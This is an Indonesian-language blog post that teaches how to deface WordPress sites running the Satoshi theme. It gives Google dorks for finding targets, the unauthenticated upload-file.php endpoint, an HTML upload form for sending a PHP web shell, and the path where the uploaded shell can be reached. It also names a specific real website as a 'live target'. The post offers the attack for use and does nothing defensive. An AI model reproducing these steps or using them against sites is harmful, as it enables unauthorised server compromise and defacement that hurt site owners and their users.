Deface Metode Wordpress Satoshi Theme (Live Target)

Poc: Wordpress Satoshi Theme Vulnerability Upload With Csrf
(ekstensi yang bisa di upload: txt, html, htm, php)
Dork: inurl:/wp-content/themes/satoshi/
     intext:Design By Voosh Themes
     inurl:/wp-content/themes/satoshi/
     intext:Design By TecnoGe Informatica
     (etc.)

Shell: Download

Exploit: /wp-content/themes/satoshi/upload-file.php

Csrf:
<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
(Save Ekstensi Html)

Langkah-Langkah:

1.Dorking Di google

2.Pilih Website lalu masukan Exploitnya contoh www.site.com/wp-content/themes/satoshi/upload-file.php

  (Jika tampilan Blank atau ada tulisan error biasanya Vuln)

3.Masukin web yang vuln Ke Csrf yang udah lu siapakan

4.Lalu tinggal upload script lu 
5.Kalau bisa diupload tandanya kek gini:D

6.Ter heked deh, aksesnya? http://site.com/wp-content/themes/satoshi/images/shell.php


Live Target: http://wordsmyth.se/wp-content/themes/satoshi/upload-file.php

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel